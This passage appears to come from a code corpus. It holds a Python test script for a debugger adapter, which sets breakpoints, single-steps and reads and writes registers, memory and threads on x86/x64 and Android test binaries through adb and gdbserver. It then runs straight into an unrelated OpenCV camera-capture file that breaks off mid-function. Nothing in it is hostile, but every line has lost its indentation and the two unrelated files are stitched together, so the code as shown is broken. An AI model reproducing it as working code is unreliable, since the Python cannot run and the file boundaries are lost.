assert data[0x10:0x12] in [b'\x02\x00', b'\x03\x00'] # e_type ET_EXEC or ET_DYN (pie)
#assert_equality(data[0x12:0x14], b'\x3E\x00' # e_machine EM_X86_64)
e_entry = unpack('<Q', data[0x18:0x20])[0]
e_phoff = unpack('<Q', data[0x20:0x28])[0]
e_phentsize = unpack('<H', data[0x36:0x38])[0]
e_phnum = unpack('<H', data[0x38:0x3a])[0]
print('e_entry:0x%X e_phoff:0x%X e_phentsize:0x%X e_phnum:0x%X' %
(e_entry, e_phoff, e_phentsize, e_phnum))
# find first PT_LOAD
p_vaddr = None
offs = e_phoff
for i in range(e_phnum):
p_type = unpack('<I', data[offs:offs+4])[0]
#print('at offset 0x%X p_type:0x%X' % (offs, p_type))
if p_type == 1:
p_vaddr = unpack('<Q', data[offs+16:offs+24])[0]
break
offs += e_phentsize
if p_vaddr == None:
raise Exception('couldnt locate a single PT_LOAD program header')
load_addr = p_vaddr
entry_offs = e_entry - p_vaddr
else:
raise Exception('expected e_ident[EI_CLASS] to be 1 or 2, got: %d' % data[4])
else:
raise Exception('unrecognized file type')
print('(file) load addr: 0x%X' % load_addr)
print('(file) entry offset: 0x%X' % entry_offs)
return (load_addr, entry_offs)
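# Hedged usage sketch: for a non-PIE binary the runtime entrypoint is simply the
# file's load address plus the entry offset, e.g. (hypothetical testbin path):
#   (load_addr, entry_offs) = parse_image('./testbins/helloworld_x64-linux')
#   entry = load_addr + entry_offs
# For PIE/ASLR binaries the tests below substitute the runtime base reported by
# the debug adapter instead (see confirm_initial_module).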
# 'helloworld' -> '.\testbins\helloworld.exe' (windows)
# 'helloworld' -> './testbins/helloworld' (linux, android)
def testbin_to_fpath():
global testbin
if testbin.endswith('-win') or testbin.endswith('-windows'):
testbin = testbin + '.exe'
tmp = os.path.join('testbins', testbin)
if '~' in tmp:
tmp = os.path.expanduser(tmp)
tmp = os.path.abspath(tmp)
return tmp
# 'helloworld_armv7-android' -> '/data/local/tmp/helloworld_armv7-android'
def testbin_to_mpath():
global testbin
m = re.match(r'^.*_(.*)-(.*)$', testbin)
(mach, os_) = m.group(1, 2)
if os_ == 'android':
return '/data/local/tmp/' + testbin
else:
return testbin_to_fpath()
def break_into(adapter):
print('sending break')
adapter.break_into()
def invoke_adb_gdb_listen(testbin_args, port=31337):
global testbin
if '_armv7-' in testbin: gdbserver = 'gdbserver_armv7'
elif '_aarch64-' in testbin: gdbserver = 'gdbserver_aarch64'
else: raise Exception('cannot determine gdbserver architecture from %s' % testbin)
cmdline = []
cmdline.append('adb')
cmdline.append('shell')
cmdline.append('/data/local/tmp/%s :%d /data/local/tmp/%s' % (gdbserver, port, testbin))
cmdline.extend(testbin_args)
print('invoke_adb() executing: %s' % ' '.join(cmdline))
shellout(cmdline)
print('invoke_adb() done')
def is_wow64():
global testbin
if not 'x86' in testbin: return False
(a,b) = platform.architecture()
return a=='64bit' and b.startswith('Windows')
def go_initial(adapter):
global testbin
if is_wow64():
(reason, info) = adapter.go()
assert_equality((reason, info), (DebugAdapter.STOP_REASON.UNKNOWN, 0x4000001f))
return adapter.go()
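# Hedged note: 0x4000001f is the NTSTATUS value STATUS_WX86_BREAKPOINT; under
# WOW64 (32-bit testbin on 64-bit Windows) the first continue reports this extra,
# benign stop, which go_initial() above swallows so callers only see the stop
# they actually arranged (breakpoint, process exit, ...).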
def assert_equality(a, b):
if a == b: return
utils.red('EXPECTED EQUALITY!')
utils.red(' actual: %s' % a)
utils.red('expected: %s' % b)
traceback.print_stack()
sys.exit(-1)
# let there be a single check for single-step
# (abstract away OS-exceptional cases)
def expect_single_step(reason):
global testbin
if 'macos' in testbin:
expected = DebugAdapter.STOP_REASON.BREAKPOINT
else:
expected = DebugAdapter.STOP_REASON.SINGLE_STEP
assert_equality(reason, expected)
def expect_bad_instruction(reason):
global testbin
# :/ I cannot induce a bad instruction exception on these OS's!
if 'macos' in testbin or 'windows' in testbin or 'android' in testbin:
expected = DebugAdapter.STOP_REASON.ACCESS_VIOLATION
else:
expected = DebugAdapter.STOP_REASON.ILLEGAL_INSTRUCTION
assert_equality(reason, expected)
def assert_general_error(func):
raised = False
try:
func()
except DebugAdapter.GeneralError:
raised = True
assert raised
# determines the runtime entrypoint from the adapter's module list and the on-disk image
def confirm_initial_module(adapter):
global testbin
fpath = testbin_to_fpath()
mpath = testbin_to_mpath()
module2addr = adapter.mem_modules()
#print('module2addr: ', ' '.join(['%s:%X' % (i[0],i[1]) for i in module2addr.items()]))
#print(' mpath: ', mpath)
if not mpath in module2addr:
mpath = os.path.basename(mpath)
assert mpath in module2addr
(load_addr, entry_offs) = parse_image(fpath)
print(' load_addr: 0x%X' % load_addr)
if '_pie' in testbin:
# pie: override file's load address with runtime load address
load_addr = module2addr[mpath]
else:
# non-pie: file's load address should match runtime load address
assert_equality(module2addr[mpath], load_addr)
return load_addr + entry_offs
def android_test_setup(testbin_args=[]):
global testbin
# send file to phone
fpath = testbin_to_fpath()
shellout(['adb', 'push', fpath, '/data/local/tmp'])
# launch adb
threading.Thread(target=invoke_adb_gdb_listen, args=[testbin_args]).start()
# connect to adb
time.sleep(.25)
adapter = gdb.DebugAdapterGdb()
adapter.connect('localhost', 31337)
entry = confirm_initial_module(adapter)
return (adapter, entry)
#------------------------------------------------------------------------------
# MAIN
#------------------------------------------------------------------------------
if __name__ == '__main__':
colorama.init()
arg = sys.argv[1] if sys.argv[1:] else None
# one-off tests
if arg == 'oneoff':
testbin = 'helloworld_thread'
fpath = testbin_to_fpath()
adapter = DebugAdapter.get_adapter_for_current_system()
adapter.exec(fpath)
print(adapter.mem_modules())
print(type(adapter) == dbgeng.DebugAdapterDbgeng)
sys.exit(0)
# otherwise test all executables built in the testbins dir
testbins = []
for fname in os.listdir('testbins'):
fpath = os.path.join('testbins', fname)
if platform.system() == 'Windows':
if fpath.endswith('.exe'):
testbins.append(fname)
elif os.access(fpath, os.X_OK):
testbins.append(fname)
print('collected the following tests:\n', testbins)
#--------------------------------------------------------------------------
# x86/x64 TESTS
#--------------------------------------------------------------------------
# repeat adapter use tests
for tb in filter(lambda x: x.startswith('helloworld_x64'), testbins):
testbin = tb
fpath = testbin_to_fpath()
def thread_task():
adapter = DebugAdapter.get_adapter_for_current_system()
adapter.exec(fpath, ['segfault'])
# set initial breakpoint
entry = confirm_initial_module(adapter)
adapter.breakpoint_set(entry)
# go to breakpoint
(reason, extra) = go_initial(adapter)
assert_equality(reason, DebugAdapter.STOP_REASON.BREAKPOINT)
# clear, single step a few times
adapter.breakpoint_clear(entry)
(reason, extra) = adapter.step_into()
expect_single_step(reason)
(reason, extra) = adapter.step_into()
expect_single_step(reason)
(reason, extra) = adapter.step_into()
expect_single_step(reason)
# go until executing done
(reason, extra) = adapter.go()
assert_equality(reason, DebugAdapter.STOP_REASON.PROCESS_EXITED)
adapter.quit()
adapter = None
for i in range(10):
utils.green('testing %s %d/10' % (fpath, i+1))
t = threading.Thread(target=thread_task)
t.start()
t.join()
# return code tests
for tb in [x for x in testbins if x.startswith('exitcode')]:
testbin = tb
fpath = testbin_to_fpath()
# some systems return only the low byte of the 32-bit exit code, others return the full 32-bit code
testvals = [('-11',[245,4294967285]), ('-1',[4294967295,255]), ('-3',[4294967293,253]), ('0',[0]), ('3',[3]), ('7',[7]), ('123',[123])]
for (arg, expected) in testvals:
adapter = DebugAdapter.get_adapter_for_current_system()
utils.green('testing %s %s' % (tb, arg))
adapter.exec(fpath, [arg])
(reason, extra) = go_initial(adapter)
assert_equality(reason, DebugAdapter.STOP_REASON.PROCESS_EXITED)
if not extra in expected:
raise Exception('expected return code %d to be in %s' % (extra, expected))
# exception test
for tb in testbins:
if not tb.startswith('do_exception'): continue
if not ('x86' in tb or 'x64' in tb): continue
utils.green('testing %s' % tb)
testbin = tb
adapter = DebugAdapter.get_adapter_for_current_system()
fpath = testbin_to_fpath()
# segfault
adapter.exec(fpath, ['segfault'])
(reason, extra) = go_initial(adapter)
assert_equality(reason, DebugAdapter.STOP_REASON.ACCESS_VIOLATION)
adapter.quit()
# illegal instruction
adapter.exec(fpath, ['illegalinstr'])
(reason, extra) = go_initial(adapter)
expect_bad_instruction(reason)
adapter.quit()
# breakpoint, single step, exited
adapter.exec(fpath, ['fakearg'])
entry = confirm_initial_module(adapter)
adapter.breakpoint_set(entry)
(reason, extra) = go_initial(adapter)
assert_equality(reason, DebugAdapter.STOP_REASON.BREAKPOINT)
adapter.breakpoint_clear(entry)
#print('rip: ', adapter.reg_read('rip'))
(reason, extra) = adapter.step_into()
#print('rip: ', adapter.reg_read('rip'))
expect_single_step(reason)
(reason, extra) = adapter.step_into()
#print('rip: ', adapter.reg_read('rip'))
expect_single_step(reason)
(reason, extra) = adapter.go()
assert_equality(reason, DebugAdapter.STOP_REASON.PROCESS_EXITED)
adapter.quit()
# divzero
adapter.exec(fpath, ['divzero'])
(reason, extra) = go_initial(adapter)
assert_equality(reason, DebugAdapter.STOP_REASON.CALCULATION)
adapter.quit()
# assembler x86/x64 tests
for tb in testbins:
if not (tb.startswith('asmtest_x64') or tb.startswith('asmtest_x86')): continue
utils.green('testing %s' % tb)
testbin = tb
# parse entrypoint information
fpath = testbin_to_fpath()
(load_addr, entry_offs) = parse_image(fpath)
entry = load_addr + entry_offs
# tester and testee run on same machine
adapter = DebugAdapter.get_adapter_for_current_system()
adapter.exec(fpath, '')
xip = 'eip' if 'x86' in tb else 'rip'
loader = adapter.reg_read(xip) != entry
if loader: print('loader detected, gonna step a few times for fun')
else: print('entrypoint is the program, no library or loader')
# a few steps in the loader
if loader:
(reason, extra) = adapter.step_into()
expect_single_step(reason)
# set bp entry
print('setting entry breakpoint at 0x%X' % entry)
adapter.breakpoint_set(entry)
# few more steps
if loader:
(reason, extra) = adapter.step_into()
expect_single_step(reason)
# go to entry
(reason, extra) = go_initial(adapter)
assert_equality(adapter.reg_read(xip), entry)
adapter.breakpoint_clear(entry)
# step into nop
adapter.step_into()
assert_equality(adapter.reg_read(xip), entry+1)
# step into call, return
adapter.step_into()
adapter.step_into()
# back
assert_equality(adapter.reg_read(xip), entry+6)
adapter.step_into()
# step into call, return
adapter.step_into()
adapter.step_into()
# back
assert_equality(adapter.reg_read(xip), entry+12)
(reason, extra) = adapter.go()
assert_equality(reason, DebugAdapter.STOP_REASON.PROCESS_EXITED)
adapter.quit()
print('PASS!')
# helloworld x86/x64, no threads
for tb in testbins:
if not tb.startswith('helloworld_'): continue
if not ('_x64-' in tb or '_x86-' in tb): continue
if '_thread' in tb: continue
utils.green('helloworld x86/x64, no threads, testing %s' % tb)
testbin = tb
# tester and testee run on same machine
adapter = DebugAdapter.get_adapter_for_current_system()
fpath = testbin_to_fpath()
adapter.exec(fpath, '')
entry = confirm_initial_module(adapter)
if '_x86-' in tb:
(bits, xip, xax, xbx) = (32, 'eip', 'eax', 'ebx')
(testval_a, testval_b) = (0xDEADBEEF, 0xCAFEBABE)
else:
(bits, xip, xax, xbx) = (64, 'rip', 'rax', 'rbx')
(testval_a, testval_b) = (0xAAAAAAAADEADBEEF, 0xBBBBBBBBCAFEBABE)
print('%s: 0x%X' % (xip, adapter.reg_read(xip)))
# breakpoint set/clear should fail at 0
print('expect breakpoint clear failure at 0')
try:
adapter.breakpoint_clear(0)
except DebugAdapter.BreakpointClearError:
pass
print('expect breakpoint set failure at 0')
try:
adapter.breakpoint_set(0)
except DebugAdapter.BreakpointSetError:
pass
# breakpoint set/clear should succeed at entrypoint
print('setting breakpoint at 0x%X' % entry)
adapter.breakpoint_set(entry)
print('clearing breakpoint at 0x%X' % entry)
adapter.breakpoint_clear(entry)
print('setting breakpoint at 0x%X' % entry)
adapter.breakpoint_set(entry)
# proceed to breakpoint
print('going')
(reason, extra) = go_initial(adapter)
assert_equality(reason, DebugAdapter.STOP_REASON.BREAKPOINT)
assert_equality(adapter.reg_read(xip), entry)
adapter.breakpoint_clear(entry)
# single step until it wasn't over a call
while 1:
addr = adapter.reg_read(xip)
data = adapter.mem_read(addr, 15)
assert_equality(len(data), 15)
(asmstr, asmlen) = utils.disasm1(data, 0)
print('%s: 0x%X %s' % (xip, addr, asmstr))
(reason, info) = adapter.step_into()
expect_single_step(reason)
if asmstr.startswith('call'): continue
if asmstr.startswith('jmp'): continue
break
addr2 = adapter.reg_read(xip)
print('%s: 0x%X' % (xip, addr2))
assert_equality(addr + asmlen, addr2)
print('registers')
for (ridx,rname) in enumerate(adapter.reg_list()):
width = adapter.reg_bits(rname)
#print('%d: %s (%d bits)' % (ridx, rname, width))
assert_equality(adapter.reg_bits(xax), bits)
assert_equality(adapter.reg_bits(xbx), bits)
assert_general_error(lambda: adapter.reg_bits('rzx'))
print('registers read/write')
rax = adapter.reg_read(xax)
rbx = adapter.reg_read(xbx)
assert_general_error(lambda: adapter.reg_read('rzx'))
adapter.reg_write(xax, testval_a)
assert_equality(adapter.reg_read(xax), testval_a)
adapter.reg_write(xbx, testval_b)
assert_general_error(lambda: adapter.reg_read('rzx'))
assert_equality(adapter.reg_read(xbx), testval_b)
adapter.reg_write(xax, rax)
assert_equality(adapter.reg_read(xax), rax)
adapter.reg_write(xbx, rbx)
assert_equality(adapter.reg_read(xbx), rbx)
print('mem read/write')
addr = adapter.reg_read(xip)
data = adapter.mem_read(addr, 256)
assert_general_error(lambda: adapter.mem_write(0, b'heheHAHAherherHARHAR'))
data2 = b'\xAA' * 256
adapter.mem_write(addr, data2)
assert_general_error(lambda: adapter.mem_read(0, 256))
assert_equality(adapter.mem_read(addr, 256), data2)
adapter.mem_write(addr, data)
assert_equality(adapter.mem_read(addr, 256), data)
print('quiting')
adapter.quit()
adapter = None
# helloworlds x86/x64 with threads
for tb in testbins:
if not tb.startswith('helloworld_thread'): continue
if not ('_x86-' in tb or '_x64-' in tb): continue
utils.green('testing %s' % tb)
testbin = tb
# for x64 machine, tester and testee run on same machine
adapter = DebugAdapter.get_adapter_for_current_system()
fpath = testbin_to_fpath()
adapter.exec(fpath, '')
entry = confirm_initial_module(adapter)
if '_x86-' in tb: xip = 'eip'
else: xip = 'rip'
print('scheduling break in 1 second')
threading.Timer(1, break_into, [adapter]).start()
print('going')
(reason, extra) = go_initial(adapter)
print('back')
print('switching to bad thread')
assert_general_error(lambda: adapter.thread_select(999))
print('asking for threads')
if platform.system() == 'Windows':
# main thread at WaitForMultipleObjects() + 4 created threads + debugger thread
nthreads_expected = 6
else:
# main thread at pthread_join() + 4 created threads
nthreads_expected = 5
tids = adapter.thread_list()
if len(tids) != nthreads_expected:
print('expected %d threads, but len(tids) is %d' % (nthreads_expected, len(tids)))
assert False
tid_active = adapter.thread_selected()
addrs = []
for tid in tids:
adapter.thread_select(tid)
addr = adapter.reg_read(xip)
addrs.append(addr)
seltxt = '<--' if tid == tid_active else ''
print('thread %02d: %s=0x%016X %s' % (tid, xip, addr, seltxt))
if not is_wow64():
# on wow64, threads commonly stop at wow64cpu!TurboDispatchJumpAddressEnd+0x544, so matching addresses are expected there
assert addrs[0] != addrs[1] # thread at WaitForMultipleObjects()/pthread_join() should be different
print('switching to bad thread')
assert_general_error(lambda: adapter.thread_select(999))
secs = 1
print('scheduling break in %d second(s)' % secs)
threading.Timer(secs, break_into, [adapter]).start()
print('going')
adapter.go()
print('back')
print('checking for %d threads' % nthreads_expected)
assert_equality(len(adapter.thread_list()), nthreads_expected)
# ensure the eip/rip are in different locations (that the continue actually continued)
addrs2 = []
for tid in tids:
adapter.thread_select(tid)
addr2 = adapter.reg_read(xip)
addrs2.append(addr2)
if not is_wow64():
print('checking that at least one thread progressed')
if list(filter(lambda x: not x, [addrs[i]==addrs2[i] for i in range(len(addrs))])) == []:
print('did any threads progress?')
print('addrs: ', map(hex,addrs))
print('addrs2: ', map(hex,addrs2))
assert False
print('done')
adapter.quit()
#--------------------------------------------------------------------------
# {ARMV7,AARCH64}-ANDROID TESTS
#--------------------------------------------------------------------------
# helloworld armv7, no threads
for tb in testbins:
if not tb.startswith('helloworld_'): continue
if not '_armv7-' in tb: continue
if '_thread' in tb: continue
utils.green('testing %s' % tb)
testbin = tb
(adapter, entry) = android_test_setup()
print('pc: 0x%X' % adapter.reg_read('pc'))
# breakpoint set/clear should fail at 0
print('breakpoint failures')
try:
adapter.breakpoint_clear(0)
except DebugAdapter.BreakpointClearError:
pass
try:
adapter.breakpoint_set(0)
except DebugAdapter.BreakpointSetError:
pass
# breakpoint set/clear should succeed at entrypoint
print('setting breakpoint at 0x%X' % entry)
adapter.breakpoint_set(entry)
print('clearing breakpoint at 0x%X' % entry)
adapter.breakpoint_clear(entry)
print('setting breakpoint at 0x%X' % entry)
adapter.breakpoint_set(entry)
# proceed to breakpoint
print('going')
(reason, info) = adapter.go()
assert_equality(reason, DebugAdapter.STOP_REASON.BREAKPOINT)
pc = adapter.reg_read('pc')
print('pc: 0x%X' % pc)
assert_equality(pc, entry)
# single step
data = adapter.mem_read(pc, 15)
assert_equality(len(data), 15)
(asmstr, asmlen) = utils.disasm1(data, 0, 'armv7')
adapter.breakpoint_clear(entry)
(reason, info) = adapter.step_into()
assert_equality(reason, DebugAdapter.STOP_REASON.SINGLE_STEP)
pc2 = adapter.reg_read('pc')
print('pc2: 0x%X' % pc2)
assert_equality(pc + asmlen, pc2)
print('registers')
for (ridx,rname) in enumerate(adapter.reg_list()):
width = adapter.reg_bits(rname)
#print('%d: %s (%d bits)' % (ridx, rname, width))
assert_equality(adapter.reg_bits('r0'), 32)
assert_equality(adapter.reg_bits('r4'), 32)
assert_general_error(lambda: adapter.reg_bits('rzx'))
print('registers read/write')
r0 = adapter.reg_read('r0')
r4 = adapter.reg_read('r4')
assert_general_error(lambda: adapter.reg_read('rzx'))
adapter.reg_write('r0', 0xDEADBEEF)
assert_equality(adapter.reg_read('r0'), 0xDEADBEEF)
adapter.reg_write('r4', 0xCAFEBABE)
assert_general_error(lambda: adapter.reg_read('rzx'))
assert_equality(adapter.reg_read('r4'), 0xCAFEBABE)
adapter.reg_write('r0', r0)
assert_equality(adapter.reg_read('r0'), r0)
adapter.reg_write('r4', r4)
assert_equality(adapter.reg_read('r4'), r4)
print('mem read/write')
addr = adapter.reg_read('pc')
data = adapter.mem_read(addr, 256)
assert_general_error(lambda: adapter.mem_write(0, b'heheHAHAherherHARHAR'))
data2 = b'\xAA' * 256
adapter.mem_write(addr, data2)
assert_general_error(lambda: adapter.mem_read(0, 256))
assert_equality(adapter.mem_read(addr, 256), data2)
adapter.mem_write(addr, data)
assert_equality(adapter.mem_read(addr, 256), data)
print('quiting')
adapter.quit()
adapter = None
# helloworld with threads
# architectures: armv7, aarch64
for tb in testbins:
if not tb.startswith('helloworld_thread_'): continue
if not (('_armv7-' in tb) or ('_aarch64-' in tb)): continue
utils.green('testing %s' % tb)
testbin = tb
(adapter, entry) = android_test_setup()
print('pc: 0x%X' % adapter.reg_read('pc'))
print('scheduling break in 0.3 seconds')
threading.Timer(.3, break_into, [adapter]).start()
print('going')
adapter.go()
print('back')
print('switching to bad thread')
assert_general_error(lambda: adapter.thread_select(999))
print('asking for threads')
tids = adapter.thread_list()
assert_equality(len(tids), 5)
tid_active = adapter.thread_selected()
pcs = []
for tid in tids:
adapter.thread_select(tid)
pc = adapter.reg_read('pc')
pcs.append(pc)
seltxt = '<--' if tid == tid_active else ''
print('thread %02d: pc=0x%016X %s' % (tid, pc, seltxt))
assert pcs[0] != pcs[1] # thread at WaitForMultipleObjects()/pthread_join() should be different
print('switching to bad thread')
assert_general_error(lambda: adapter.thread_select(999))
secs = 1
print('scheduling break in %d second(s)' % secs)
threading.Timer(secs, break_into, [adapter]).start()
print('going')
adapter.go()
print('back')
print('checking for %d threads' % 5)
assert_equality(len(adapter.thread_list()), 5)
# ensure the pc's are in different locations (that the continue actually continued)
pcs2 = []
for tid in tids:
adapter.thread_select(tid)
pcs2.append(adapter.reg_read('pc'))
print('checking that at least one thread progressed')
#print(' pcs: ', pcs)
#print('pcs2: ', pcs2)
if list(filter(lambda x: not x, [pcs[i]==pcs2[i] for i in range(len(pcs))])) == []:
print('did any threads progress?')
print(' pcs: ', pcs)
print('pcs2: ', pcs2)
assert False
print('done')
adapter.quit()
# exception test
for tb in testbins:
if not tb.startswith('do_exception'): continue
if not '-android' in tb: continue
utils.green('testing %s' % tb)
testbin = tb
# segfault
(adapter, entry) = android_test_setup(['segfault'])
(reason, extra) = go_initial(adapter)
assert_equality(reason, DebugAdapter.STOP_REASON.ACCESS_VIOLATION)
adapter.quit()
# illegal instruction
(adapter, entry) = android_test_setup(['illegalinstr'])
(reason, extra) = go_initial(adapter)
expect_bad_instruction(reason)
adapter.quit()
# breakpoint, single step, exited
(adapter, entry) = android_test_setup(['fakearg'])
entry = confirm_initial_module(adapter)
adapter.breakpoint_set(entry)
(reason, extra) = go_initial(adapter)
assert_equality(reason, DebugAdapter.STOP_REASON.BREAKPOINT)
adapter.breakpoint_clear(entry)
#print('rip: ', adapter.reg_read('rip'))
(reason, extra) = adapter.step_into()
#print('rip: ', adapter.reg_read('rip'))
expect_single_step(reason)
(reason, extra) = adapter.step_into()
#print('rip: ', adapter.reg_read('rip'))
expect_single_step(reason)
(reason, extra) = adapter.go()
assert_equality(reason, DebugAdapter.STOP_REASON.PROCESS_EXITED)
adapter.quit()
# divzero
# https://community.arm.com/developer/ip-products/processors/b/processors-ip-blog/posts/divide-and-conquer
# ARMv7-A - divide by zero always returns a zero result.
# ARMv7-R - the SCTLR.DZ bit controls whether you get a zero result or a Undefined Instruction exception when you attempt to divide by zero (the default is to return zero).
# ARMv7-M - the CCR.DIV_0_TRP bit controls whether an exception is generated. If this occurs, it will cause a UsageFault and the UFSR.DIVBYZERO bit will indicate the reason for the fault.
#(adapter, entry) = android_test_setup(['divzero'])
#if 'aarch64' in tb:
# # aarch64 compiled binaries divide by 0 just fine, return "inf" *shrug*
# assert_equality(reason, DebugAdapter.STOP_REASON.PROCESS_EXITED)
#else:
# assert_equality(reason, DebugAdapter.STOP_REASON.CALCULATION)
#adapter.quit()
# assembler test
# architectures: armv7, aarch64
for tb in filter(lambda x: x.startswith('asmtest_armv7') or x.startswith('asmtest_aarch64'), testbins):
utils.green('testing %s' % tb)
testbin = tb
(adapter, entry) = android_test_setup()
loader = adapter.reg_read('pc') != entry
if loader:
print('loader detected, gonna step a few times for fun')
else:
print('entrypoint is the program, no library or loader')
# a few steps in the loader
if loader:
(reason, extra) = adapter.step_into()
expect_single_step(reason)
# set bp entry
print('setting entry breakpoint at 0x%X' % entry)
adapter.breakpoint_set(entry)
# few more steps
if loader:
(reason, extra) = adapter.step_into()
expect_single_step(reason)
# go to entry
adapter.go()
assert_equality(adapter.reg_read('pc'), entry)
adapter.breakpoint_clear(entry)
# step into nop
adapter.step_into()
assert_equality(adapter.reg_read('pc'), entry+4)
# step into call, return
adapter.step_into()
adapter.step_into()
# back
assert_equality(adapter.reg_read('pc'), entry+8)
adapter.step_into()
# step into call, return
adapter.step_into()
adapter.step_into()
# back
assert_equality(adapter.reg_read('pc'), entry+16)
(reason, extra) = adapter.go()
assert_equality(reason, DebugAdapter.STOP_REASON.PROCESS_EXITED)
adapter.quit()
# helloworld aarch64, no threads
for tb in testbins:
if not tb.startswith('helloworld_'): continue
if not '_aarch64-' in tb: continue
if '_thread' in tb: continue
utils.green('testing %s' % tb)
testbin = tb
(adapter, entry) = android_test_setup()
print('pc: 0x%X' % adapter.reg_read('pc'))
# breakpoint set/clear should fail at 0
print('breakpoint failures')
try:
adapter.breakpoint_clear(0)
except DebugAdapter.BreakpointClearError:
pass
try:
adapter.breakpoint_set(0)
except DebugAdapter.BreakpointSetError:
pass
# breakpoint set/clear should succeed at entrypoint
print('setting breakpoint at 0x%X' % entry)
adapter.breakpoint_set(entry)
print('clearing breakpoint at 0x%X' % entry)
adapter.breakpoint_clear(entry)
print('setting breakpoint at 0x%X' % entry)
adapter.breakpoint_set(entry)
# proceed to breakpoint
print('going')
(reason, info) = adapter.go()
assert_equality(reason, DebugAdapter.STOP_REASON.BREAKPOINT)
pc = adapter.reg_read('pc')
print('pc: 0x%X' % pc)
assert_equality(pc, entry)
# single step
data = adapter.mem_read(pc, 15)
assert_equality(len(data), 15)
(asmstr, asmlen) = utils.disasm1(data, 0, 'armv7')
adapter.breakpoint_clear(entry)
(reason, info) = adapter.step_into()
expect_single_step(reason)
pc2 = adapter.reg_read('pc')
print('pc2: 0x%X' % pc2)
assert_equality(pc + asmlen, pc2)
print('registers')
for (ridx,rname) in enumerate(adapter.reg_list()):
width = adapter.reg_bits(rname)
#print('%d: %s (%d bits)' % (ridx, rname, width))
assert_equality(adapter.reg_bits('x0'), 64)
assert_equality(adapter.reg_bits('x4'), 64)
assert_general_error(lambda: adapter.reg_bits('rzx'))
print('registers read/write')
x0 = adapter.reg_read('x0')
x4 = adapter.reg_read('x4')
assert_general_error(lambda: adapter.reg_read('rzx'))
adapter.reg_write('x0', 0xDEADBEEF)
assert_equality(adapter.reg_read('x0'), 0xDEADBEEF)
adapter.reg_write('x4', 0xCAFEBABE)
assert_general_error(lambda: adapter.reg_read('rzx'))
assert_equality(adapter.reg_read('x4'), 0xCAFEBABE)
adapter.reg_write('x0', x0)
assert_equality(adapter.reg_read('x0'), x0)
adapter.reg_write('x4', x4)
assert_equality(adapter.reg_read('x4'), x4)
print('mem read/write')
addr = adapter.reg_read('pc')
data = adapter.mem_read(addr, 256)
assert_general_error(lambda: adapter.mem_write(0, b'heheHAHAherherHARHAR'))
data2 = b'\xAA' * 256
adapter.mem_write(addr, data2)
assert_general_error(lambda: adapter.mem_read(0, 256))
assert_equality(adapter.mem_read(addr, 256), data2)
adapter.mem_write(addr, data)
assert_equality(adapter.mem_read(addr, 256), data)
if not '_loop' in tb:
print('going')
(reason, extra) = adapter.go()
assert_equality(reason, DebugAdapter.STOP_REASON.PROCESS_EXITED)
print('quitting')
adapter.quit()
adapter = None
utils.green('TESTS PASSED!')
|
cv2capture.py
|
###############################################################################
# OpenCV video capture
# Uses opencv video capture to capture system's camera
# Adapts to the operating system and allows configuration of the codec
# Urs Utzinger
#
# 2021 Initialize, removed frame access (use only the queue)
# 2019 Initial release, based on Bitbuckets FRC 4183 code
###############################################################################
###############################################################################
# Imports
###############################################################################
# Multi Threading
from threading import Thread, Lock
from queue import Queue
# System
import logging, time, sys
# Open Computer Vision
import cv2
###############################################################################
# Video Capture
###############################################################################
class cv2Capture(Thread):
"""
This thread continually captures frames from a camera
"""
# Initialize the Camera Thread
# Opens Capture Device and Sets Capture Properties
############################################################################
def __init__(self, configs,
camera_num: int = 0,
res: tuple = None, # width, height
exposure: float = None,
queue_size: int = 32):
# populate desired settings from configuration file or function arguments
####################################################################
self._camera_num = camera_num
if exposure is not None:
self._exposure = exposure
else:
self._exposure = configs['exposure']
if res is not None:
self._camera_res = res
else:
self._camera_res = configs['camera_res']
self._output_res = configs['output_res']
self._output_width = self._output_res[0]
self._output_height = self._output_res[1]
self._framerate = configs['fps']
self._flip_method = configs['flip']
self._buffersize = configs['buffersize'] # camera driver buffer size
self._fourcc = configs['fourcc'] # camera sensor encoding format
self._autoexposure = configs['autoexposure'] # autoexposure depends on camera
self.capture = Queue(maxsize=queue_size)
self.log = Queue(maxsize=32)
self.stopped = True
self.cam_lock = Lock()
# open up the camera
self._open_cam()
# Init vars
self.frame_time = 0.0
self.measured_fps = 0.0
Thread.__init__(self)
# Thread routines #################################################
# Start Stop and Update Thread
###################################################################
def stop(self):
"""stop the thread"""
self.stopped = True
# clean up
def start(self):
"""set the thread start conditions"""
self.stopped = False
T = Thread(target=self.update)
T.daemon = True # run in background
T.start()
# After starting the thread, this runs continuously
def update(self):
"""run the thread"""
last_time = time.time()
num_frames = 0
while not self.stopped:
current_time = time.time()
if self.cam is not None:
with self.cam_lock:
_, img = self.cam.read()
num_frames += 1
self.frame_time = int(current_time*1000)
if (img is not None) and (not self.capture.full()):
if (self._output_height > 0) or (self._flip_method > 0):
# adjust output height
img_resized = cv2.resize(img, self._output_res)
# flip resized image
if self._flip_method == 0: # no flipping
img_proc = img_resized
elif self._flip_method == 1: # ccw 90
img_proc = cv2.rotate(img_resized, cv2.ROTATE_90_COUNTERCLOCKWISE)
elif self._flip_method == 2: # rot 180, same as flip lr & up
img_proc = cv2.rotate(img_resized, cv2.ROTATE_180)
elif self._flip_method == 3: # cw 90
img_proc = cv2.rotate(img_resized, cv2.ROTATE_90_CLOCKWISE)
elif self._flip_method == 4: # horizontal
img_proc = cv2.flip(img_resized, 0)
elif self._flip_method == 5: # upright diagonal. ccw & lr
img_proc = cv2.flip(cv2.rotate(img_resized, cv2.ROTATE_90_COUNTERCLOCKWISE), 1)
elif self._flip_method == 6: # vertical
img_proc = cv2.flip(img_resized, 1)
elif self._flip_method == 7: # upperleft diagonal
img_proc = cv2.transpose(img_resized)
else:
img_proc = img_resized # not a valid flip method
else:
img_proc = img
self.capture.put_nowait((self.frame_time, img_proc))
else:
if not self.log.full(): self.log.put_nowait((logging.WARNING, "CV2:Capture Queue is full!"))
# FPS calculation
if (current_time - last_time) >= 5.0: # update frame rate every 5 secs
self.measured_fps = num_frames/5.0
if not self.log.full(): self.log.put_nowait((logging.INFO, "CAM:FPS:{}".format(self.measured_fps)))
last_time = current_time
num_frames = 0
self.cam.release()
# Setup the Camera
############################################################################
def _open_cam(self):
"""
Open up the camera so we can begin capturing frames
"""
# Open the camera with platform optimal settings
if sys.platform.startswith('win'):
self.cam = cv2.VideoCapture(self._camera_num, apiPreference=cv2.CAP_DSHOW) # CAP_VFW or CAP_DSHOW or CAP_MSMF or CAP_ANY
elif sys.platform.startswith('darwin'):
self.cam = cv2.VideoCapture(self._camera_num, apiPreference=cv2.CAP_AVFOUNDATION)
elif sys.platform.startswith('linux'):
